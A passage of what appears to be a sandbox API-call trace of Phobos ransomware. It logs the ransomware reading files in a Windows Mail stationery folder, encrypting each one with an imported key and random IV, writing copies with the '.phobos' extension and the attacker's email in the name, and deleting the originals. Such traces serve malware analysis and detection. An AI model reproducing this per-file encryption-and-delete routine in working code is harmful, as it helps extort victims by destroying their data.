[0201.701] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.701] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x432, lpOverlapped=0x0) returned 1 [0201.821] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x440, dwBufLen=0x440 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x440) returned 1 [0201.821] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x440, lpOverlapped=0x0) returned 1 [0201.822] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0201.822] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0201.822] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0201.822] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.822] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0201.823] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.823] CloseHandle (hObject=0x100) returned 1 [0201.823] CloseHandle (hObject=0x160) returned 1 [0202.371] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg")) returned 1 [0202.382] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.390] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=232) returned 1 [0202.390] CloseHandle (hObject=0x174) returned 1 [0202.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm")) returned 0x2020 [0202.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.390] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.390] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.391] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.391] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe8, lpOverlapped=0x0) returned 1 [0202.413] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0202.413] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0202.414] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.414] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.414] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.414] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.414] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.414] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.414] CloseHandle (hObject=0x174) returned 1 [0202.414] CloseHandle (hObject=0x100) returned 1 [0202.414] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm")) returned 1 [0202.415] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.416] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5115) returned 1 [0202.416] CloseHandle (hObject=0x100) returned 1 [0202.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg")) returned 0x2020 [0202.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.416] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.416] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.417] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.417] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13fb, lpOverlapped=0x0) returned 1 [0202.422] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1400, dwBufLen=0x1400 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1400) returned 1 [0202.422] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1400, lpOverlapped=0x0) returned 1 [0202.422] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.423] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.423] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.423] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.423] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.423] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.423] CloseHandle (hObject=0x100) returned 1 [0202.423] CloseHandle (hObject=0x174) returned 1 [0202.423] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg")) returned 1 [0202.424] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.426] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=233) returned 1 [0202.426] CloseHandle (hObject=0x174) returned 1 [0202.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm")) returned 0x2020 [0202.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.426] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.426] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.426] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.426] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.426] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe9, lpOverlapped=0x0) returned 1 [0202.427] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0202.427] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0202.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.428] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.428] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.428] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.428] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.428] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.428] CloseHandle (hObject=0x174) returned 1 [0202.428] CloseHandle (hObject=0x100) returned 1 [0202.428] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm")) returned 1 [0202.429] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.429] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1920) returned 1 [0202.429] CloseHandle (hObject=0x100) returned 1 [0202.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg")) returned 0x2020 [0202.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.430] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.430] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.430] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.430] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.430] ReadFile (in: hFile=0x100, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x780, lpOverlapped=0x0) returned 1 [0202.432] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x790, dwBufLen=0x790 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x790) returned 1 [0202.432] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x790, lpOverlapped=0x0) returned 1 [0202.501] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.501] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.501] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0202.501] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.501] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0202.501] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.501] CloseHandle (hObject=0x100) returned 1 [0202.501] CloseHandle (hObject=0x174) returned 1 [0202.501] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg")) returned 1 [0202.502] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0202.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.503] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=237) returned 1 [0202.503] CloseHandle (hObject=0x174) returned 1 [0202.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm")) returned 0x2020 [0202.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0202.503] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.503] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0202.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0202.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0202.504] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.504] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xed, lpOverlapped=0x0) returned 1 [0202.505] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0202.505] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0202.505] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0202.505] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0202.505] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0202.505] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.505] WriteFile (in: hFile=0x100, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0202.506] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.506] CloseHandle (hObject=0x174) returned 1 [0202.506] CloseHandle (hObject=0x100) returned 1 [0202.506] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm")) returned 1 [0202.506] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, 